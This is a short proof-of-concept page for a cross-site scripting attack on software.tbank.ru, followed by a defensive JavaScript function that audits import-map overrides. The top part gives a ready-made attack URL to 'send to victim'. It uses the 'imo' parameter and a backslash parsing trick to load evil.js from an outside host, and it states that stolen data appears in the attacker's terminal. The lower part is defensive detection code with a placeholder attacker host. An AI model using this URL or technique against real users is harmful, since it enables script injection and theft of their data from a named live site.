PoC: software.tbank.ru XSS
Attack URL (send to victim):
https://software.tbank.ru/?imo=%7B%22imports%22%3A%7B%22%40tinkoff-software%2Fauth%22%3A%22https%3A%2F%2F%5C%5Cskills.autoterminal-miniapp.ru%2Fevil.js%22%7D%7D
Open attack URL in new tab
Stolen data will appear in the terminal.
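
A defender-side check for the parameter carried in the URL above, as an added example that is not part of the original page or the site's own code: it decodes the `imo` query parameter as a JSON import map and reports every target whose browser-resolved origin falls outside an allow-list. `ALLOWED_ORIGINS`, the function names and the `cdn.attacker.example` sample host are assumptions.

```javascript
// Added example. ALLOWED_ORIGINS is an assumed allow-list, not the site's real policy.
const ALLOWED_ORIGINS = new Set(["https://software.tbank.ru"]);

// Constructed sample with the same shape as the URL on this page (placeholder host).
const SAMPLE = "https://software.tbank.ru/?imo=" + encodeURIComponent(JSON.stringify({
  imports: { "@tinkoff-software/auth": "https:/\\cdn.attacker.example/evil.js" },
}));

// Resolve a target the way a browser does and return its origin.
// The WHATWG URL parser treats "\" as "/" for http(s), so "https:/\host/x"
// resolves to host "host"; prefix checks on the raw string miss this.
function resolvedOrigin(target, pageUrl) {
  try {
    return new URL(target, pageUrl).origin;
  } catch {
    return null; // unparsable target: treated as not allowed
  }
}

// Return one finding per import-map entry that points outside the allow-list.
function auditImportMapOverride(pageUrl) {
  const raw = new URL(pageUrl).searchParams.get("imo");
  if (raw === null) return [];
  let map;
  try {
    map = JSON.parse(raw);
  } catch {
    map = null;
  }
  if (map === null || typeof map !== "object") {
    return [{ specifier: null, target: raw, origin: null, reason: "imo is not a JSON object" }];
  }
  const findings = [];
  // Check the top-level imports and every scoped table.
  const tables = [map.imports, ...Object.values(map.scopes || {})];
  for (const table of tables) {
    for (const [specifier, target] of Object.entries(table || {})) {
      const origin = typeof target === "string" ? resolvedOrigin(target, pageUrl) : null;
      if (origin === null || !ALLOWED_ORIGINS.has(origin)) {
        findings.push({ specifier, target, origin, reason: "target outside allow-list" });
      }
    }
  }
  return findings;
}
```

The same function can run server-side over access logs or client-side before any override is honoured; the stricter fix is to not accept import-map overrides from the query string in production builds at all.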